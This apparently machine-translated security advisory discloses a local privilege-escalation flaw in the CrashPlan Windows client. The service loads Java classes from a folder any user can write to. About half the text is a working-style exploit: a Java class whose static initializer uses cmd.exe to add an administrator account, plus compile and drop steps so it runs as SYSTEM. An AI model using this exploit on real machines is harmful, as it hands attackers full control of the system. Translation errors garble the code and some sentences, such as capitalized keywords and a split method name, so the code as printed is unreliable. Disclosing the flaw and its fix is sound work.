Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, crashplan Client
Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, this article is about CrashPlan Windows client 4.8.2.4, the existence of Local Elevation of Privilege Vulnerability reporting and technical analysis. This vulnerability can be abused by any local user and gain full control over the operating system. Currently, this vulnerability has been verified on the fully-fixed Windows 7 x64 English version.
The fundamental problem is that the Windows Service CrashPlan backup service loads and executes files from Insecure File System Locations C: \ ProgramData \ CrashPlan.
Among them, the Java Class file is searched and finally loaded from there. This causes the CLASS side-loading vulnerability.
The default file system ACL allows any local user to append new files.
Therefore, malicious files can be deleted. To use it, I constructed the following Java classes:
Package org. slf4j. ext;
Import java. io. Serializable;
Import java. io. ByteArrayInputStream;
Import java. io. ByteArrayOutputStream;
Import java. util. Date;
Import java. util. HashMap;
Import java. util. Iterator;
Import java. util. Map;
Import java. beans. XMLDecoder;
Import java. beans. XMLEncoder;
Import java. beans. ExceptionListener;
/**
* Base class for Event Data. Event Data contains data to be logged about
* Event. Users may extend this class for each EventType they want to log.
*
* @ Author Ralph Goers
*/
Public class EventData implements Serializable {
Static
{
Try {
Runtime rt = Runtime. getRuntime ();
Process pr = rt.exe c ("cmd.exe/C \" net user attacker Batman42/add & net localgroup Administrators attacker/add \"");
} Catch (Exception e ){
E. printStackTrace ();
}
}
/**
* Default Constructor
*/
Public EventData (){
}
}
To inject your own commands, we use Java static initialization program. These will be executed immediately after the JVM loads the class. To compile it, you only need to use javac:
Javac EventData. java
Finally, put the compiled Java class file in the C: \ ProgramData \ CrashPlan \ lang \ org \ slf4j \ ext folder to be created.
After the SYSTEM restarts, this Java class will be loaded and our code will be executed with the SYSTEM permission. In this example, an attacker adds a local administrator account to the operating system.
Repair suggestions
Upgrade the vulnerability version to the latest version as soon as possible.
Timeline
2017.5.18: vulnerability confirmation
2017.5.22: Record and notify the manufacturer
2017.5.25: the vendor confirms the vulnerability and urgent repair
2017.6.13: fixed version released. And released relevant instructions.
2018.2.15: Public Disclosure